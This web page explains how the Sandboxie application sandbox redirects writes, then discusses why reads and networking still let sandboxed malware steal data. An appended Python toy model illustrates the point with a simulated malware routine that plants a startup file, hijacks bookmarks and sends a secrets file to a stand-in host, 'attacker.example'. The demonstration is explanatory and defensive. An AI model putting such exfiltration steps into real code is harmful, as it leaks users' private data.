Sandboxie describes itself like this:
When you run a program on your computer, data flows from the hard disk to the program via read operations. The data is then processed and displayed, and finally flows back from the program to the hard disk via write operations.
For example, if you run the Freecell program to play a game, it starts by reading the previously recorded statistics, displaying and altering them as you play the game, and finally writing them back to disk for future reference.
Sandboxie changes the rules such that write operations do not make it back to your hard disk.
The illustration shows the key component of Sandboxie: a transient storage area, or sandbox. Data flows in both directions between programs and the sandbox. During read operations, data may flow from the hard disk into the sandbox. But data never flows back from the sandbox into the hard disk.
If you run Freecell inside the Sandboxie environment, Sandboxie reads the statistics data from the hard disk into the sandbox, to satisfy the read requested by Freecell. When the game later writes the statistics, Sandboxie intercepts this operation and directs the data to the sandbox.
If you then run Freecell without the aid of Sandboxie, the read operation would bypass the sandbox altogether, and the statistics would be retrieved from the hard disk.
The transient nature of the sandbox makes it easy to get rid of everything in it. If you were to throw away the sandbox, by deleting everything in it, the sandboxed statistics would be gone for good, as if they had never been there in the first place.
Sandboxie and the Web
Protecting your Freecell statistics using Sandboxie may be a good idea when a less qualified player comes along, but you will probably want to play most of your games outside the sandbox. On the other hand, you may want to run your Web browser inside the sandbox most of the time. This way any incoming, unsolicited software (spyware, malware and the like) that you download, is trapped in the sandbox. Changes made to your list of Favorites or Bookmarks, hijacking of your preferred start page, new and unwanted icons on your desktop — all these, and more, are trapped in and bound to the sandbox.
You could also try a new toolbar add-on, browser extension or just about any kind of software. If you don't like it, you throw away the sandbox, and start again with a fresh sandbox. On the other hand, if you do like the new piece of software, you can re-install it outside the sandbox so it becomes a permanent part of your system.
Sandboxie intercepts changes to both your files and registry settings, making it virtually impossible for any software to reach outside the sandbox.
Sandboxie traps cached browser items into the sandbox as a by-product of normal operation, so when you throw away the sandbox, all the history records and other side-effects of your browsing disappear as well.
Which means, if I understand it right, that it would be safe to run IE with ActiveX turned on? It might even be safe to run Exchange???
Not quite. First, as with any sandbox, it only helps you to the extent that compromising the sandboxed application itself is not the goal. So if the goal is to commandeer Exchange itself, as opposed to the rest of the machine on which it is running, running Exchange sandboxed won’t prevent that. Second, code running inside the sandbox still has a lot of power. Reads and networking still work. So malicious code (e.g. compromising ActiveX controls) can read private data and send the results out over the net. The sandbox only makes it harder to write such exploits because fewer capabilities are available in the sandbox. If it depended on overwriting system files and affecting the application the next time it is started, running the application in a fresh sandbox every time would thwart the attack.
What’s missing is a way to determine if only the changes you knowingly made will be written back to the disk if you save the results of running in the sandbox back to disk. (Or is that not a possibility?) In any case, the fact that compromises are often not apparent to the user is key. If only the sandbox communicated what had been changed, and if the user had the time/patience and ability to make sense of that communication… then we might be getting somewhere… As it is, this might be a useful tool for some people for some purposes, but is not close to a general solution…
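To make the two halves of this discussion concrete (the read-through/write-redirect mechanism in Sandboxie's own description above, and the limits and the "what changed?" question raised in the reply), here is a small Python model of a Sandboxie-style overlay. It is an added illustration, not Sandboxie's code or anything from the original page: the host disk and the sandbox are plain dictionaries, reads consult the sandbox first and fall through to the host, writes and deletes only ever land in the sandbox, `discard()` throws the sandbox away, `changes()` is the audit report the reply wishes for, and `commit()` writes back only the paths you choose. The file names, the "Freecell" statistics format, the bookmark hijack and the `attacker.example` destination are all constructed for the example.

```python
"""Toy model of Sandboxie-style write redirection (added example, not Sandboxie's code).

Host disk and sandbox are both dicts mapping path -> bytes.  Reads fall through
to the host when the sandbox has no copy; writes and deletes never leave the
sandbox.  Networking is deliberately NOT intercepted, to mirror the point in the
reply that reads plus networking are enough to exfiltrate private data.
"""
from dataclasses import dataclass, field

TOMBSTONE = object()  # marks a file deleted inside the sandbox; the host copy is untouched


@dataclass
class Sandbox:
    host: dict                                   # constructed stand-in for the hard disk
    overlay: dict = field(default_factory=dict)  # the transient sandbox
    network_log: list = field(default_factory=list)

    def read(self, path):
        """Sandboxed read: the overlay wins, otherwise fall through to the host."""
        if path in self.overlay:
            data = self.overlay[path]
            if data is TOMBSTONE:
                raise FileNotFoundError(path)
            return data
        if path in self.host:
            return self.host[path]
        raise FileNotFoundError(path)

    def write(self, path, data):
        """Sandboxed write: redirected into the overlay; the host never changes."""
        self.overlay[path] = data

    def delete(self, path):
        """Sandboxed delete: recorded as a tombstone, host copy kept."""
        if path not in self.overlay and path not in self.host:
            raise FileNotFoundError(path)
        self.overlay[path] = TOMBSTONE

    def send(self, dest, data):
        """Networking is not sandboxed: whatever was read can leave the machine."""
        self.network_log.append((dest, data))

    def discard(self):
        """Throw the sandbox away; every redirected write vanishes."""
        self.overlay.clear()

    def changes(self):
        """Report what the sandboxed programs would have done to the host."""
        report = []
        for path, data in sorted(self.overlay.items()):
            if data is TOMBSTONE:
                report.append((path, "deleted"))
            elif path not in self.host:
                report.append((path, "created"))
            elif self.host[path] != data:
                report.append((path, "modified"))
        return report

    def commit(self, paths):
        """Write back only the selected paths (the changes you knowingly made)."""
        for path in paths:
            data = self.overlay.pop(path)
            if data is TOMBSTONE:
                self.host.pop(path, None)
            else:
                self.host[path] = data


def run_freecell(sb):
    """The Freecell scenario: read the statistics, play one winning game, write them back."""
    games, wins = (int(part.split(b"=")[1]) for part in sb.read("freecell.ini").split(b";"))
    sb.write("freecell.ini", b"games=%d;wins=%d" % (games + 1, wins + 1))


def run_malware(sb):
    """A sandboxed compromise: persistence is trapped, but read-and-exfiltrate still works."""
    sb.write("startup/evil.exe", b"MZ...")               # would survive a reboot outside the sandbox
    sb.write("bookmarks.html", b"<a href=hijacked>")     # the bookmark hijack from the text
    sb.send("attacker.example", sb.read("secrets.txt"))  # not blocked: reads + network suffice


def demo():
    """Run both programs in one sandbox, keep only the Freecell change, discard the rest."""
    host = {  # constructed host disk contents
        "freecell.ini": b"games=10;wins=4",
        "bookmarks.html": b"<a href=good>",
        "secrets.txt": b"hunter2",
    }
    sb = Sandbox(host)
    run_freecell(sb)
    run_malware(sb)
    report = sb.changes()        # what the user would have to review
    sb.commit(["freecell.ini"])  # the one change we knowingly made
    sb.discard()                 # evil.exe and the hijacked bookmarks never reach the disk
    return report, list(sb.network_log), dict(host)


if __name__ == "__main__":
    for item in demo():
        print(item)
```

The `changes()` report is the easy part; the hard part the reply points at is that the user still has to know that `startup/evil.exe` is not theirs, and nothing in the report can undo the `secrets.txt` exfiltration, because the sandbox only intercepts writes.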